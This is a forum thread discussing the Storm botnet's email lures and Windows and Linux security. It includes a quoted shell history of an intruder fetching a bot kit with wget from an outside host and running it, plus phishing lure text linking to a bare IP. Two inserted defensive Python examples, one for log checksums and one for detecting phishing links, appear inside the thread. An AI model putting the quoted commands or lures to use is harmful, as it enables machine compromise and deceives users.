Storm Botnet Is Behind Two New Attacks
We've gotten a number of submissions about the new tricks the massive Storm botnet has been up to. Estimates of the size of this botnet range from 250K-1M to 5M-10M compromised machines. Reader cottagetrees notes a writeup at Exploit Prevention Labs on a new social engineering attack involving YouTube. The emails, which may be targeted at people who use private domain registrations, warn the recipient that their "face is all over 'net" on a YouTube video. The link is to a Storm-infected bot that attacks using the Q4Rollup exploit (a package of about a dozen encrypted exploits). And reader thefickler writes that the recent wave of "confirmation spam" is also due to Storm, as was the earlier, months-long "e-card from a friend" series of attack emails.
I had a 500% increase in Spam on Tuesday Last Week (Score:4, Interesting)
I fscking hate SPAM!
Re:I had a 500% increase in Spam on Tuesday Last W (Score:2)
Re:I had a 500% increase in Spam on Tuesday Last W (Score:2)
Neither blog provides proof, forensic details, or anything even remotely interesting to a geek seeking out "news for nerds." Just the bare necessary to make it look like it's a well-meaning tech link and not a scheme to inflate someone's page views.
All they are is a couple of paragraphs saying, "Hey, you know all those new spam messages you're getting? The
Re: (Score:2)
It is also a peer bonding thing, like "It burns when I pee." "Hey, it burns when I pee as well!"
Re:I had a 500% increase in Spam on Tuesday Last W (Score:2, Insightful)
Re: (Score:2, Funny)
Re:I had a 500% increase in Spam on Tuesday Last W (Score:3, Informative)
Skynet... (Score:3, Funny)
http://www.emhsoft.com/singularity/ [emhsoft.com]
YKIMS!
Brings up a point (Score:2)
Imagine if they put this botnet to a real use, like Seti@Home. They'd be uber-points people in no time.
But noooo, they have to be all evilly criminal types, don't they.
Re: (Score:2)
I thought about doing this for folding@home (cure cancer with a virus!), but once you get mondo points, someone's going to ask if you have _legitimate_ access to all those computers. Vijay likes to keep everything above board.
As for seti@home, I'd run it if it wasn't for the idea that I have that as communication gets more advanced, the less there is reliance on sending analogue electromagnetic waves hither and yon through the aether. SETI
Re: (Score:2)
Re: (Score:2)
How does the infection spread? (Score:2)
First they need to open the message. It should have gotten filtered into a junk folder (if not blocked altogether) so the user must be actually going through their junk mail folder and reading things. Who has time to waste on that?
Now, I'd assume noone will get infected just by opening the mail. They'd have to at the very least click on the link. Will clicking be enough to infect a computer? Does it depend on th
Re: (Score:2, Informative)
If that doesn't work, they usually bring up a page saying something like 'If you are seeing this message, please download our secure login software', along with a link.
I'm surprised they even try something as obvious as this, but I assume that
Re: (Score:2)
Neither SpamAssassin nor GMail's mail filters are nabbing a lot of this stuff at first. I've marked about 15 of them as spam on my website's GMail account and yet similar messages are *still* getting through. I can certainly understand how people are being infected in the first
Re:How does the infection spread? (Score:4, Insightful)
Many naive users would really want to see the e-card their friend has sent (even though it is never mentioned who that friend may be) so they click the link.
The next page explains they have to load some software. Not too unusual in the naive user's world. They visit websites all the time that tell them that they have to update their flash plugin, a codec, an active-x component, or whatever. They already click away those pop-ups that warn them before they have actually read them.
Besides, the first page explains that they have to click OK and go through the installation or they will not be able to see the card. Who would want to turn down their friend and not view an e-card sent to them?
So the trojan is downloaded and installed. No problem, because they are logged in as an administrator. Who sets up their system to use separate accounts for admin and use? Maybe 1% of users try that.
So, the naive user very easily gets infected. Mainly because in the past they have seen so many useless pop-ups warning them about potentially harmful things that others have told them they should click away (like getting a warning when you delete something). A pop-up no longer is an alerting event that requires attention, it is just a stupid window that gets in the way of your "internet experience".
Furthermore, most users are not prepared to think about security or to take extra steps to secure their systems (like using a separate account for software installation and system maintenance).
Re:How does the infection spread? (Score:4, Insightful)
Oh, and also because most of those warnings are really not useful for the user. They shove the responsibility on the one person least suited to actually make the call. "Hey, loser, W32kdrv.dll wants to access 0xf4a50cb to do CrypicThing() which could result in Lengthytechnobabblethatsoundsverymuchlikethenonse
Re: (Score:2)
Re: (Score:2)
Bottom line, if I tell my Mom to only use Firefox, is she protected against all of this?
Arggg! (Score:4, Insightful)
~Not AC cause I don't value my karma~
Re:Arggg! (Score:5, Insightful)
Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
Re: (Score:2)
I'd pick Option C: Millions of Windows 2000/XP boxes connected to cable/dsl.
Re: (Score:2)
A good deal of which have ISPs that block outgoing connections on port 25, which isn't a problem for servers.
Re: (Score:2)
Ok, and if you were a spammer, where would you rather host your spam bot? On grandma's Win98 box connected to a modem that occasionally comes online, or a big Linux/Solaris/whatever server on a DS3? Because while Linux may not be very popular as a desktop OS, it's certainly common as a server. And servers tend to have much better connections than a normal computer.
Servers are going to be more highly scrutinized. Where I work, we have multiple IDS watching the network, and bandwidth monitors that watch for spikes. If a host started using up any significant amount of our bandwidth, we'd know, and we'd shut it down. Not so for most home computers. Bot infections can last for years on home computers when the user doesn't know that there's something wrong, or that they need to fix something.
Linux in its default configuration has no open ports and can be installed safely without a firewall defending it. Can't say the same about many MS OSes. Certainly not Windows 9x, of which there's still a lot of copies running out there (and not supported anymore, thanks MS!)
Linux is a kernel. A distribution of Linux could easily have open ports, an
Re: (Score:2, Informative)
Gentoo FTW! (Score:2)
I set up an Ubuntu VPS recently because the service provider didn't offer Gentoo. In addition to sshd, the VPS already had Apache and Sendmail installed and running. There were some ports associated with VPS management that were open. I think Samba may have even been ins
Windows is inherently less secure (Score:5, Informative)
If that was the case, then why are Microsoft applications (like IIS) more often compromised than non-Microsoft applications even in areas where Microsoft is NOT dominant?
Windows is inherently less secure than most of the competition in a number of ways.
1. The Microsoft HTML control's use of ActiveX is inherently insecure and can not be fixed without breaking every application that uses the HTML control.
1a. This insecure design was deliberate and Microsoft fought the Justice Department to a standstill rather than change or replace it.
2. Windows requires a number of insecure services to run to perform routine operations.
2a. There is no way to force these services to be run local-only without using a firewall.
2b. This means that Windows Firewall has to be used to secure Windows to the same degree as a UNIX based system WITHOUT a firewall.
3. Windows document formats are still based on serialized COM objects. It's even possible for them to include serialized COM objects in XML files.
3a. Serialized COM objects can refer to or even contain insecure code that can be used for an attack.
The idea that any one of these three issues and their consequent corollaries are accepted boggles my mind. The idea that they're defended by the claim that the only reason Windows is more often compromised is that it is more common...I can not conceive of the confusion in the mind that would lead to such a conclusion.
Re: (Score:3, Informative)
Re: (Score:3, Insightful)
1a. Back in the old "classic" Mac era the Mac went through a period where it was the prime target for attacks, despite it having a fraction of the market, simply because it had such a huge surface area to attack.
1b. Apple responded to many exploits (for example, in autorun CDs and floppies) by removing dangerous capabilities.
1c. Similarly, UNIX systems usually don't come with the "r" suite enabled or oft
Re: (Score:2)
Prior to using 2.0, 1.x totally disabled autoinsertion and autoplay (the normal behavior). I ran a Microsoft utility (Autoplay Repair Wizard) that verifies the sanity of autoplay registry and it re-enabled autoinsertion and autoplay (some inconsistencies were corrected [HKLM
Re: (Score:2)
Do some research and read about when Microsoft first started talking about ActiveX and the response of the industry at that time.
Hint: The response was unfavorable and mainly for security reasons.
Extra Credit: Name three Windows exploits that required no user interaction to be successful that existed within the last 5 years.
Re: (Score:2)
Interesting Question (Score:3, Interesting)
From my understanding there is no viral content in the message, so your virus scanner would have no reason to block the message. A Spam filtering company could well "pass the buck" and say that this is a virus problem, yes it's going to trigger on some spam rules, but "Where it's a virus problem, why create special rules for it"
I can see this type of attack becoming more popular in the future, at least until this question is solved.
Re: (Score:2)
If a message is trying to sell me "V1A afdsuiwre GRA", SpamAssassin takes care of it, and scores it to hell, and I never see it;
If a message is infected with Trojan.Dropper.C ClamD detects it, flags it as a virus, and I never see it.
(If anybody has the text of one of these, and they feel like posting it, that would be cool, 'cause I haven't gotten any... I feel so unloved, just like when the lovebug went around)
Yes the message falls und
Re: (Score:2)
Re: (Score:2)
Personally I think all of the e-card things (illegitimate, and otherwise) should all rot in hell. If I want to sell my e-mail address to spammers, that's my thing
Re: (Score:2)
Comment removed (Score:4, Funny)
Re:If only they could use the botnet for the good. (Score:2)
Re: (Score:2)
It's not just windows they're exploiting... (Score:5, Interesting)
root@zomg:~# cat
root@zomg:~# cat
ssh localhost
w
cat
cat
passwd
cd
ks
l
sl
ls
ls- all
ls -all
mkdir " "
cd " "
clear
wget imaginez0r.xhost.ro/botme.tar.gz
tar zxvf botme.tar.gz
rm -rf botme.tar.gz
cd
PATH=.:$PATH
bash
These kind of attacks happen every day, sometimes more than once a day. If you don't patch and secure your machine, or do stupid things like download and run binaries, it's gonna get owned. Doesn't matter what OS you run.
Re: (Score:3, Interesting)
Re:It's not just windows they're exploiting... (Score:5, Informative)
As far as xhost, You can get a free account [xhost.ro] too
Make sure you run logwatch and logrotate and md5 the logs when they rotate (and rotate frequently, like every minute). Then store the checksum somewhere innocent after rotating. Have logwatch automatically check the checksums on all existing logs and report on that also. hosts.deny everything but your own personal IP address (in hosts.allow) on all ports except those you need to do business. SSH ONLY, don't use telnet or other unencrypted connections. Don't allow root to connect from SSH. Don't allow su from ssh (if possible). Compile your own stuff (including your compiler), never run binaries. Use shadow passwords. Put all of your binaries on a read-only mounted partition, with
Most of this is duh stuff and easy to do, and you should have it written in your procedures for building a new box. I believe the NSA has some guidelines also.
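The log-checksum part of the procedure above, as an added example that is not the commenter's own code: rotate a log, record a checksum of the rotated copy in a separate store, and later re-verify every archived copy. It uses SHA-256 in place of the MD5 the comment mentions; the file names, the store layout and the sample log lines are constructed for this example.

```python
"""Added example (not from the thread): rotate a log, checksum the rotated
copy into a separate store, and later verify every stored copy against its
recorded checksum. SHA-256 is used rather than MD5; file names and the store
layout are assumptions of this example."""
import hashlib
import os
import shutil
import tempfile
import time


def sha256_file(path):
    """Hash a file in chunks so large logs do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def rotate_log(log_path, archive_dir, checksum_store, stamp=None):
    """Copy the live log into archive_dir under a timestamped name, truncate
    the live file, and append '<sha256>  <archived path>' to checksum_store.
    The store should live somewhere the logging host cannot rewrite (another
    partition or host). Returns the archived path."""
    stamp = stamp or time.strftime("%Y%m%d%H%M%S")
    archived = os.path.join(archive_dir, f"{os.path.basename(log_path)}.{stamp}")
    shutil.copy2(log_path, archived)
    open(log_path, "w").close()  # truncate the live log in place
    with open(checksum_store, "a") as store:
        store.write(f"{sha256_file(archived)}  {archived}\n")
    return archived


def verify_archives(checksum_store):
    """Re-hash every archived log listed in checksum_store.
    Returns a dict: path -> 'ok' | 'modified' | 'missing'."""
    results = {}
    with open(checksum_store) as store:
        for line in store:
            line = line.strip()
            if not line:
                continue
            expected, path = line.split("  ", 1)
            if not os.path.exists(path):
                results[path] = "missing"
            elif sha256_file(path) != expected:
                results[path] = "modified"
            else:
                results[path] = "ok"
    return results


def demo():
    """Run the cycle on a constructed log in a temp directory: rotate twice,
    verify (all ok), scrub one archive, verify again."""
    base = tempfile.mkdtemp()
    log = os.path.join(base, "auth.log")
    archive = os.path.join(base, "archive")
    store = os.path.join(base, "checksums.txt")
    os.mkdir(archive)
    # constructed sample log lines
    with open(log, "w") as f:
        f.write("Sep 10 03:12:01 zomg sshd[411]: Accepted password for bob from 10.0.0.5\n")
    first = rotate_log(log, archive, store, stamp="1")
    with open(log, "w") as f:
        f.write("Sep 10 03:13:01 zomg sshd[412]: Failed password for root from 10.0.0.9\n")
    second = rotate_log(log, archive, store, stamp="2")
    before = verify_archives(store)
    # an intruder wipes the first archive to hide the login
    open(first, "w").close()
    after = verify_archives(store)
    return first, second, before, after


if __name__ == "__main__":
    print(demo())
```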
was wondering about that (Score:2)
I don't normally get much spam - maybe one every other week, but I've gotten two of those lately
OMG, what are you doing man. This video of you is all over the net. go look at it... http://www.youtube.com/watch?v=lAC5mj7oew5 [youtube.com] (link goes to http://90.31.69.105/ [90.31.69.105])
and
LMAO, I cant believe you put this video online.
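Both lures above share one shape: the visible link text names youtube.com while the href goes to a bare IP address. The following is an added example, not code from the thread, of a mail-filter check that flags that mismatch; the sample message, the documentation IP and the crude two-label host comparison are assumptions of this example.

```python
"""Added example (not from the thread): flag <a> links in an HTML mail body
whose visible text names one host while the href points at a bare IP or a
different domain. Sample message and hosts are constructed for this example."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# a host name appearing in the visible link text, with or without a scheme
HOST_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)


class LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def registrable(host):
    """Crude last-two-labels comparison (no public-suffix list); an assumption
    of this example that is good enough for youtube.com versus an IP."""
    return ".".join(host.lower().split(".")[-2:])


def suspicious_links(html):
    """Return [(text, href, reason)] for links worth flagging."""
    parser = LinkCollector()
    parser.feed(html)
    flagged = []
    for text, href in parser.links:
        host = urlsplit(href).hostname or ""
        if is_ip(host):
            flagged.append((text, href, "href points at a bare IP address"))
            continue
        m = HOST_RE.search(text)
        if m and registrable(m.group(1)) != registrable(host):
            flagged.append((text, href, f"text names {m.group(1)} but href goes to {host}"))
    return flagged


# constructed sample in the shape of the lure quoted in the thread
SAMPLE = """<p>OMG, what are you doing man. This video of you is all over the net.
go look at it... <a href="http://203.0.113.7/">http://www.youtube.com/watch?v=EXAMPLE</a></p>
<p>Newsletter: <a href="https://example.org/unsub">example.org/unsub</a></p>
<p><a href="https://evil.example.net/login">www.example.com/login</a></p>"""

if __name__ == "__main__":
    for item in suspicious_links(SAMPLE):
        print(item)
```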
Idiot-proofing the ultimate tool (Score:5, Insightful)
You know, I can go and buy a microwave oven and plug it safely into a standardized outlet and not electrocute myself or blow up my house. I can even buy a propane tank and fire up my grill without risking my life too much. I can buy a modern automobile and feel confident that if I drive it into a tree at 30 MPH or roll it over, I still have a reasonable chance of surviving. Most things have built-in standardized safety features and/or safe failure modes (within reason).
These things I can buy are all tools, some with licensing or age restrictions attached, but all more-or-less idiot-proofed. The razor blades I bought recently to scrape paint off my windows even warned me that they were "razor sharp". Well duh.
But the most sophisticated, most powerful, most versatile, general purpose tool we humans have yet invented, the networked personal computer, has been sold to and is used by millions of people without any training whatsoever and without any warnings outside of what one might pick up from the "Dangers in Cyberspace" fluff segment on the local news.
People are using computers more and more to organize all of their critical financial information. A single security breach can have catastrophic, real consequences, if for example your identity is stolen and your credit is ruined after your bank accounts are drained overnight.
All you have to do is click on one really bad link. Sometimes, not even that.
This is just another example of how technology is changing human society in completely unpredictable ways. Back in the 80's, you might have worried about a virus wiping out your word processing file. Today, typing your username and password on an untrusted machine, even just once, can compromise your entire life, and ruin your future.
Re:Idiot-proofing the ultimate tool (Score:5, Insightful)
Extrapolating that I'm guessing that in a couple of decades the "I don't know what my computer does, so it's not my problem" defense is going to be as acceptable as "of course I ran over your daughter, I cannot drive a car at all".
Re: (Score:2)
Re: (Score:2)
I wonder what will happen if a bunch of insurance companies all got hit with suits going after home owner liability insurance payoffs. Would the insurance companies then go after MS or would they just force all insured home owners to run the latest version of their favorite corp's bad anti-virus code?
Re: (Score:2)
I'm skeptical.
You can be skeptical for those that enter no personal data such as passwords, account numbers, and credit card info online, but for everyone else their future is ruined when their accounts are drained and even their identity stolen because a trojan forwarded their keystrokes to a Commie, excuse me, enterprising capitalist thriving in a socialist country.
rd
Re: (Score:2)
They'll replace thousands of dollars transferred from your account? There was a big writeup on this recently about how the funds were used to buy stuff and sent to a network of unsuspecting accomplices who were duped into shipping the contraband overseas.
At no point in the article did anyone s
Is there a point to this torture anymore? (Score:2)
Does Storm Only Attack Windows? (Score:5, Insightful)
Does it read slashdot? (Score:2)
Disconnect them (Score:2)
Post reasons why this is a bad idea here. I'm beginning to have difficulty understanding why so little action is being taken.
Re: (Score:2)
Re: (Score:2)
What? It's nowhere near a small step. It's a huge step to go from "let's get infected, unsecured spam factories off the Internet" to "let's destroy peer to peer". Spam botnets have nothing in common with P2P networks. Spamming is illegal under Federal law, P2P is not.
And "infected with Linux"?!? You sound like a Microsoft shill. Nobody gets "infected" with Linux, they install
New Global Holiday (Score:2)
Storm what? Yea, that's right, fuck you Storm, we just reformatted every computer connected to the internet today.
Yea I know, good luck getting everyone on board. I just wish it were possible because even though I don't know who operates these Botnets if I were to find out I would absolutely LOVE to kick them in the nuts.
Re: (Score:2)
The obvious solution is to just direct the botnets to recognize the first Reformat Day automatically.
Re: (Score:3, Interesting)
Remember grandma with the hacked computer is running software that is owned by Microsoft. She only licensed it and the owner is still to blame.
Comment removed (Score:5, Insightful)
Re:Ha! (Score:5, Insightful)
OK, since you used the word "keeps building", I assume this is about more like Vista than Windows 95.
But if a trojan in Vista asks you to elevate its privileges (due to UAC) to run administrative tasks such as installing itself in the system, and the user clicks yes, what should happen instead? This would be equivalent to a Linux user getting an email telling him he needs to run some shady software under root privileges, and the user saying "yes please, do that now".
Re: (Score:2)
I haven't used Vista but I was under the impression that UAC is really broken because it's constantly spamming you with stupid questions to the
Re: (Score:2)
This is not flamebait. It was a true observation: people should not criticize Vista's UAC if they genuinely don't know anything about it. People who think UAC is overly obtrusive haven't used Vista enough: during the initial install phase, yes, you need to grant access fairly often. But that's no different than on any Linux machine. The problem is that most programs that have no business requiring root access (AIM?) require it for a successful in
Re: (Score:3, Insightful)
But the user is not a technical system. When you deal with users, you need to follow good user interface guidelines, not just technical, binary thinking. That's where MS - despite their money, years of experience, own research center and all - still produced a total failure. UAC is one of the worst abominations of user interface design ever. You can give an entire presentation on its shortcomings.
Re: (Score:2, Insightful)
Re: (Score:2)
Re: (Score:3, Informative)
Re: (Score:2)
I do agree that it's the user who is the security hole here, and that wouldn't change even if everyone was running unix rather than windows. Both those systems suffer from a basic design flaw that assumes that all processes should run
Re: (Score:2)
Re: (Score:2)
Re:Ha! (Score:4, Insightful)
Let's say that Windows was magically replaced by (say) Ubuntu installs tomorrow, all over the world, with the best known default configuration in terms of being secure. Within a day you'd have exploits, and rapidly growing botnets.
Ideally, *you* would then be ranting about the morons who wrote the kernel, the idiots who did the filtering and mail clients, the jerks who designed the network protocols, and the nincompoops who can't rub two curly braces together without creating a security hole.
Or you could do some research and realize that this stuff is just bloody hard to get right. By anyone. By people who have been doing this their entire careers.
Look, the security holes are *already there* on other platforms. Why aren't you ranting about them?
Meh.
Re:Ha! (Score:4, Interesting)
Well, one point in favour of Linux security is the central software repository for each and every distro.
Linux users typically will not - even when the popularity of Linux rises - install random cursors, free smilies and whatnot - simply because they'll be used to installing things from the repository.
And it's quite simple to hammer that into people's heads: the software from the repository is safe. Other software is not.
There is still nothing similar in the Windows world.
Re: (Score:2)
Re: (Score:2)
Fixed for . . . well, maybe nineteen years?
The technical term for someone who puts a *nix box on the net without the latest set of updates, patches, and good planning is "0wn3ed."
Re:Ha! (Score:5, Insightful)
We've found solutions; don't use shoddy software. The problem is all of the people who haven't switched yet.
Re: (Score:3, Insightful)
This happened with XP SP2, and it happens again with Vista.
Most Linux users seem to understand that it is unwise to surf while logged in as root, but at the same time they set up the Windows systems at their friends' homes to do so, because "it would be too much of a hassle to use
Re:Ha! (Score:4, Funny)
You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?
That is hilarious.
Re:Ha! (Score:5, Insightful)
You mean it is the evil linux haxors that deliberately sabotage poor Microsoft?
That is hilarious.
Even worse: it's the good-natured Linux users who try to find a balance between Joe User's wants and needs on the one hand, and their own patience and free time on the other.
I tried. I really tried securing my ex-gf's family computer. I opened accounts for everyone. I only left admin privileges on one account. Set everything up.
Everybody just used the admin account again. Not even the fact that each could have their own desktop enticed them to use their own accounts; instead, they had one desktop full of five people's crud.
Re: (Score:2)
Everybody just used the admin account again. Not even the fact that each could have their own desktop enticed them to use their own accounts; instead, they had one desktop full of five people's crud.
Did they end up just using the admin account because of loser applications that require administrative access to install, though? Or was it more psychological/force of habit to use the "better" account?
Windows apps need to start installing in user space by default. Installing into the "system" is such a pain in the ass.
Re:Ha! (Score:5, Insightful)
As long as the situation remains like this, there is little Microsoft can do.
(BTW, if you're writing a GUI application for Linux, maybe you should think about taking similar steps. We cannot preach to others if our own house is not in order.)
Re: (Score:2)
I'm sorry, but are you advocating that an ADMIN account should not be granted read/write access to things? Isn't that sort of the point of an admin account? Further destabilizing the OS is not a good solution to an unstable OS. I'm all for making things work better for the non-admin accounts, in order to allow more people to use them,
Re:Ha! (Score:5, Informative)
Re:Ha! (Score:5, Insightful)
Staroffice 3.x was a brilliant example. When you ran its setup as root it automatically went into global per-machine setup mode, while running it as Joe Average User made it run a workstation setup. In fact Office 6.x for Windows 95/NT behaved in a similar manner as well. If you ran it from a network install it behaved differently when run as admin vs when run as an average user.
I have no idea why developers stopped doing that. IMO, that was the right behaviour.
Re: (Score:2)
I am really bloody sick of Microsoft's shoddy work.
Agreed, but the other thing about this problem that really seems to burn all the sysadmins and network admins and IT geeks out here is that with all the amazing knowledge and problem solving abilities, no one has been able to devise an elegant solution to this problem.
Well, to use the GP's analogy, while the houses are still being built out of gasoline-soaked balsa wood, what can we do to stop fires? Disallow high temperatures?
Microsoft's operating systems are currently the main problem. Until Microsoft deploys a fundamentally more secure OS or people simply stop using Windows to any great extent, there is nothing we can do. Especially nothing elegant.
The only elegant solution that comes to mind, really, is OS X. But that's more of an elegant OS than an elegant solut
B.S. (Score:5, Insightful)
Ok, I call Bullshit.
1. Microsoft DID come out with this "more secure" OS. Like it or not, Vista is a major improvement. But it gets SLAMMED by the average
This is a tangent, but still to the point: MSFT is damned if they do, damned if they don't.
2. Linux/OSX/Whatever isn't perfect. BY FAR. Right now, the reward is SO GREAT for hacking on windows boxes. You only have to scale a 6 foot fence to gain access to multi-millions of users. In, say, linux, or OSX you have to scale a 9 foot fence to gain access to a fraction of that. Right now, cracking Windows just makes sense for crackers. But you (and others) seem to think that botnets would just go away forever if only Microsoft gets their act together. That's insane. People are getting RICH off botnets. You think they're just going to stop because the game got a bit tougher? No way... As the reward factor of Windows diffuses down to the level of the other mainstream OS's, you'll see they'll get attacked more, too.
3. Microsoft isn't going anywhere. This is the nature of the game, people! So sitting around here talking about "When everyone switches" or whatever is just silly. It's childish. You think you're part of the solution b/c you run an alternative OS? You're not. If you want to be part of the solution, start thinking about how to defeat these people in a way that doesn't involve bashing Windows.
Your approach is a LOT like saying "Terrorism won't be a problem once everyone switches to Christianity."
Re: (Score:3, Interesting)
2. If you think that UAC is "security by annoyance" then you are not
Re:Ha! (Score:4, Funny)
That's because there is no elegant solution to social eng. attacks. The extent of human ignorance is obscene.
I bet if I sent out some random crap exe to a bunch of people, which when opened it would popup a box that said, "h4ck.exe would like to steal your credit card numbers, shit in your bed, and screw your girlfriend. Would you like to continue?" Ok, or cancel. And some people STILL would click ok.
There are many solutions... (Score:2)
There are plenty of solutions. A new authenticated email protocol could be devised, a switchover date set (e.g. December 31st, 2007), and the world would be largely free of spam overnight. It would take far less effort than was expended for the Y2K problem.
Anybody who didn't update their server would have their mail sent through as before but with the word "[SMTP]" inserted i
Re: (Score:2)
Re: (Score:2)
You can't block the usual ports because a lot of people do their own email stuff (VERY technical term).
There's a lot of iffy stuff involved and no matter what's done a group of people will be pissed off.
Re: (Score:2)
Re: (Score:2)
Comment removed (Score:5, Insightful)
Re: (Score:2, Insightful)
Re:Ha! (Score:4, Informative)
this kind of hubris is what can make osx/linux/whatever a zombie just as fast as anything else out there.
i guess you never heard of the old sendmail worm, php-based exploits, etc etc
if you do no work to ensure your OS is as tight as necessary, regardless of what that OS is, you will leave yourself open to being improperly utilized as a system.
-r
Re: (Score:2)
Re: (Score:2, Funny)
Re:Thank you Microsoft (Score:5, Funny)
I'm not sure which is worse: unpatched Windows machines, or Linux boxes without the critical patch that allows fanboys to type the word "you're."
Re:Thank you Microsoft (Score:4, Funny)
Re: (Score:2, Insightful)
On the other end, 10 million could possibly take out a entire ISP, and I'm talking about a backbone ISP too. THAT'S terrifying stuff.